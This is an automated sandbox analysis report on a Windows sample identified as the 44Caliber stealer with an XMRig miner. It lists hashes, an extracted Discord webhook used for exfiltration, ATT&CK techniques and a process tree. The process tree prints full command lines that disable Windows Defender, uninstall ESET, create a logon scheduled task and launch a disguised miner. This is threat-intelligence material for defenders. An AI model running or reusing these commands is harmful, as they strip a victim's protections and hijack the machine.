44caliber | 620b5b24add3610dadb6d18e4a52f1fa3c6cb5686dac389b655be6ffb1ef62e5

Analysis

max time kernel
19s
max time network
183s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
31-12-2023 01:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

22bae033c46d71990197f17a981ce3c9.exe
Size

2.3MB
MD5

22bae033c46d71990197f17a981ce3c9
SHA1

ce5488cd3d40e42917c7bb1c642da4b7817248d0
SHA256

620b5b24add3610dadb6d18e4a52f1fa3c6cb5686dac389b655be6ffb1ef62e5
SHA512

3a9448ca3b0b3074eaae4f0803f9d8522d19e5f0bbe222131a64543f374bf8658c8f9c0c08b2136bdc54439bc039e03fa4f61284aae26e15515790487731abd5
SSDEEP

49152:9T1KUWNK6HkvoHKbtaU0fG9sFbI3TWdhswrlEkj1vi25m:h49gqkvFZZ0fZsjWdhswrxj15

Score

10^/10

44caliber xmrig evasion miner stealer

Malware Config

Extracted

Family

44caliber

https://discord.com/api/webhooks/868513655556292688/7ViWQKXofSCTi8VWoHEcGeQK61RUEBYfnsE72cu6TJnpHYwlgzbrVI5gQn_jpfUMFoS5

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 4 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2656-1084-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/2656-1092-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/2656-1095-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/2656-1100-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 1 IoCs

Processes:

Interia loader.exe

pid process

2820 Interia loader.exe
Loads dropped DLL 1 IoCs

Processes:

22bae033c46d71990197f17a981ce3c9.exe

pid process

2784 22bae033c46d71990197f17a981ce3c9.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

2 freegeoip.app
3 freegeoip.app
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

312 sc.exe
920 sc.exe
3052 sc.exe
2884 sc.exe
2556 sc.exe
2876 sc.exe
2732 sc.exe
1144 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1420 schtasks.exe
2652 schtasks.exe

pid	process
2820	Interia loader.exe

pid	process
2784	22bae033c46d71990197f17a981ce3c9.exe

flow	ioc
2	freegeoip.app
3	freegeoip.app

pid	process
312	sc.exe
920	sc.exe
3052	sc.exe
2884	sc.exe
2556	sc.exe
2876	sc.exe
2732	sc.exe
1144	sc.exe

pid	process
1420	schtasks.exe
2652	schtasks.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

22bae033c46d71990197f17a981ce3c9.exe

description	pid	process	target process
PID 2784 wrote to memory of 2820	2784	22bae033c46d71990197f17a981ce3c9.exe	Interia loader.exe
PID 2784 wrote to memory of 2820	2784	22bae033c46d71990197f17a981ce3c9.exe	Interia loader.exe
PID 2784 wrote to memory of 2820	2784	22bae033c46d71990197f17a981ce3c9.exe	Interia loader.exe

C:\Users\Admin\AppData\Local\Temp\22bae033c46d71990197f17a981ce3c9.exe
"C:\Users\Admin\AppData\Local\Temp\22bae033c46d71990197f17a981ce3c9.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2784

C:\Users\Admin\AppData\Local\Temp\Interia loader.exe
"C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"
2⤵
- Executes dropped EXE
PID:2820

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
3⤵
PID:2616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
PID:2576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
PID:2428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
PID:2628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
PID:828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableArchiveScanning $true
4⤵
PID:2008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
4⤵
PID:2440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
4⤵
PID:1684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableScriptScanning $true
4⤵
PID:1132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
4⤵
PID:2488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIOAVProtection $true
4⤵
PID:2272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
5⤵
PID:2844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
4⤵
PID:2396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
4⤵
PID:2108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -MAPSReporting Disabled
4⤵
PID:1644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
4⤵
PID:2888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Stop-Service WinDefend
4⤵
PID:596

C:\Windows\system32\sc.exe
sc stop WinDefend
4⤵
- Launches sc.exe
PID:1144

C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
4⤵
- Launches sc.exe
PID:312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-Service WinDefend -StartupType Disabled
4⤵
PID:2528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
4⤵
PID:2332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
4⤵
PID:1748

C:\Windows\system32\Dism.exe
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
4⤵
PID:340

C:\Users\Admin\AppData\Local\Temp\1E098751-07A4-4217-A159-B9B40CE3D5BB\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\1E098751-07A4-4217-A159-B9B40CE3D5BB\dismhost.exe {D5C50502-143E-402C-B5CE-AA23C72F96B4}
5⤵
PID:1652

C:\Windows\System32\Wbem\WMIC.exe
Wmic Product where name="Eset Security" call uninstall
4⤵
PID:1144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
3⤵
PID:2780

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
3⤵
PID:1596

C:\Users\Admin\AppData\Roaming\Services.exe
"C:\Users\Admin\AppData\Roaming\Services.exe"
3⤵
PID:2624

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
4⤵
PID:2604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
5⤵
PID:1968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
5⤵
PID:2504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
5⤵
PID:832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableArchiveScanning $true
5⤵
PID:2124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
5⤵
PID:2664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
5⤵
PID:1772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableScriptScanning $true
5⤵
PID:548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
5⤵
PID:1948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIOAVProtection $true
5⤵
PID:1356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
5⤵
PID:2932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
5⤵
PID:2904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -MAPSReporting Disabled
5⤵
PID:2632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
5⤵
PID:2120

C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
5⤵
- Launches sc.exe
PID:2884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Stop-Service WinDefend
5⤵
PID:3040

C:\Windows\system32\sc.exe
sc stop WinDefend
5⤵
- Launches sc.exe
PID:2556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-Service WinDefend -StartupType Disabled
5⤵
PID:2108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
5⤵
PID:2844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
5⤵
PID:2904

C:\Windows\system32\Dism.exe
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
5⤵
PID:2848

C:\Windows\System32\Wbem\WMIC.exe
Wmic Product where name="Eset Security" call uninstall
5⤵
PID:2500

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
4⤵
PID:3024

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
5⤵
- Creates scheduled task(s)
PID:2652

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
4⤵
PID:2240

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
5⤵
PID:2892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
6⤵
PID:1860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
6⤵
PID:1420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
6⤵
PID:2124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
6⤵
PID:1668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableArchiveScanning $true
6⤵
PID:900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
6⤵
PID:2588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
6⤵
PID:3068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableScriptScanning $true
6⤵
PID:1720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
6⤵
PID:2992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIOAVProtection $true
6⤵
PID:2184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
6⤵
PID:2804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
6⤵
PID:976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -MAPSReporting Disabled
6⤵
PID:2908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
6⤵
PID:952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Stop-Service WinDefend
6⤵
PID:2868

C:\Windows\system32\sc.exe
sc stop WinDefend
6⤵
- Launches sc.exe
PID:2876

C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
6⤵
- Launches sc.exe
PID:2732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-Service WinDefend -StartupType Disabled
6⤵
PID:1528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
6⤵
PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
6⤵
PID:1652

C:\Windows\system32\Dism.exe
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
6⤵
PID:2936

C:\Windows\System32\Wbem\WMIC.exe
Wmic Product where name="Eset Security" call uninstall
6⤵
PID:2316

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6056254 --pass=in --cpu-max-threads-hint=40 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
4⤵
PID:2656

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
2⤵
PID:2732

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
1⤵
- Creates scheduled task(s)
PID:1420

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
1⤵
PID:2272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
2⤵
PID:2904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
2⤵
PID:320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
2⤵
PID:1376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableArchiveScanning $true
2⤵
PID:1660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
2⤵
PID:3056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:1528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableScriptScanning $true
2⤵
PID:1048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
2⤵
PID:2632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
2⤵
PID:1932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
2⤵
PID:2072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -MAPSReporting Disabled
2⤵
PID:2448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
2⤵
PID:1268

C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
2⤵
- Launches sc.exe
PID:920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Stop-Service WinDefend
2⤵
PID:2436

C:\Windows\system32\sc.exe
sc stop WinDefend
2⤵
- Launches sc.exe
PID:3052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-Service WinDefend -StartupType Disabled
2⤵
PID:2412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
2⤵
PID:576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
2⤵
PID:1676

C:\Windows\system32\Dism.exe
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
2⤵
PID:2840

C:\Users\Admin\AppData\Local\Temp\4AE6DAF6-D284-4B1B-8530-F0FDBC853E0C\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\4AE6DAF6-D284-4B1B-8530-F0FDBC853E0C\dismhost.exe {D628D3B5-12EC-4086-B15E-C10A525A7CD2}
3⤵
PID:1748

C:\Windows\System32\Wbem\WMIC.exe
Wmic Product where name="Eset Security" call uninstall
2⤵
PID:2964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
1⤵
PID:2876

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:1696

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1E098751-07A4-4217-A159-B9B40CE3D5BB\CbsProvider.dll
Filesize
74KB

MD5
224b2560d5965670ca26830f2102ae5a

SHA1
65317d8c7c696b958759d75279389241963b7db7

SHA256
5619ab009c87f6e356f699a97a85f3e45f50e43379f23f27088780cab82e86e7

SHA512
e5801287d10de3abb581b20db12c1f59729755875950c60dcdb4d2d68a72dc5c505c772e2e2502b8fc099fe1ce4bc3b9fc6882d5e7ab1994865dfa4a91850e0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E098751-07A4-4217-A159-B9B40CE3D5BB\DismCorePS.dll
Filesize
42KB

MD5
79e78f11dffbe78a4555bbb76226c47b

SHA1
756547810e37e9c8d8e34cbb5d365eecdf81fed3

SHA256
7e7a0568e9cab3f3f8203b511ff14f684e60b4cabb4f35fb75e28bb9fb085f81

SHA512
b1584a2718f959e5702a9b4a01ae84c415abb57b84c0229d397bf3df244088bd0721962fa70c710632694f00e052f1eecddfb55b6ed01ec77e616d35a40b3fc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E098751-07A4-4217-A159-B9B40CE3D5BB\DismHost.exe
Filesize
94KB

MD5
9a821d8d62f4c60232b856e98cba7e4f

SHA1
4ec5dcbd43ad3b0178b26a57b8a2f41e33a48df5

SHA256
a5b3bf53bcd3c0296498383837e8f9eb7d610c535521315a96aa740cf769f525

SHA512
1b5273a52973dac77ad0ef7aa1dda929a782d762ab8489eb90dff1062dd4cc01e4f7f4157266a2abcf8941e91cf4aa5603de1dd8ee871524748e0989ebaa37d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E098751-07A4-4217-A159-B9B40CE3D5BB\LogProvider.dll
Filesize
94KB

MD5
36fb187273fa08b83dc085b712edd599

SHA1
e685fc32054ec97b469164a61b08df64e1ec6c2b

SHA256
295aa4ab70011411338ec1a5092f7abfc2dd908df74ca8324e4087c72c67ca2a

SHA512
8c14b3f11dc8d3a337730d6f7fcd8d4e20c7a2222bcc646cd1a7ef2aa42072d2cd68cdba12c3a7b5040d8694293c21cace4e666288b1702ab28360d17e04ab8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E098751-07A4-4217-A159-B9B40CE3D5BB\OSProvider.dll
Filesize
68KB

MD5
6c7efa9a01a81a0c6abdc7c975cdcaf0

SHA1
5fa553bdca6bfce8ab5845aae2ead44589a9043c

SHA256
4621f9e86ddfd3582d5fa475c379aa77ecdf878e37830a50de3da69dad89f616

SHA512
9951f965a08170c91e813537665720e981d5fd34eb5d09577c1b9368f23e6db16f99173b19819a70a23dd191ed5be911e6b6de35cab1fcd6eebd9671aa4702b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E098751-07A4-4217-A159-B9B40CE3D5BB\dismprov.dll
Filesize
182KB

MD5
8ca117cb9338c0351236939717cb7084

SHA1
baa145810d50fdb204c8482fda5cacaaf58cdad0

SHA256
f351c3597c98ea9fe5271024fc2ccf895cc6a247fb3b02c1cdb68891dac29e54

SHA512
35b4be68666d22f82d949ad9f0ce986779355e7d2d8fd99c0e2102cd364aba4a95b5805269261a9205c1130bdd1f5101d16146d9334c27796c7f41f2c3166c35

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E098751-07A4-4217-A159-B9B40CE3D5BB\wdscore.dll
Filesize
9KB

MD5
7a3a5837add08e23f89c7b2f86de85bb

SHA1
43f2464701fb070d675691f6fa5ef7b0726cdec8

SHA256
5a08220bec6baa819bbe94a536bb7a4ee47e52653c9da44337c2dbf145b57474

SHA512
de1a9bbeb508cbb5be3a98f98c7390fadc5924091b47eab0163f9476e9006a13d81e70b68c4d179fc3c8945a9b1f41227c8c95ac8fedf8cc723869162166b7ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\4AE6DAF6-D284-4B1B-8530-F0FDBC853E0C\DismHost.exe
Filesize
67KB

MD5
bb09be6a48a5b46738fb6642f654de4c

SHA1
88b4774dece0ef8eada75f6c3b4e2d04f64ba087

SHA256
b0732ae8ab9d86b06afa8270aceb40e15698df5c16efa659055ccd254ef5ac26

SHA512
1b22de1cff6d92a59052537e29c34cd1443004056ccd84ba7f09c0fed81277aa17c6e7c0351d4dec60836b46cbe980c8e7b94b97d9b994bb6d20ed5eb38ee0ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\Insidious.exe
Filesize
79KB

MD5
267a4db46eb23193e3dd23cebfde2d68

SHA1
5372af06a60ddaf71b9e5bae037028864f5ea578

SHA256
217daedddd0389ff25fe365fc9274dd53d55625400f11559e210b4ed57fda441

SHA512
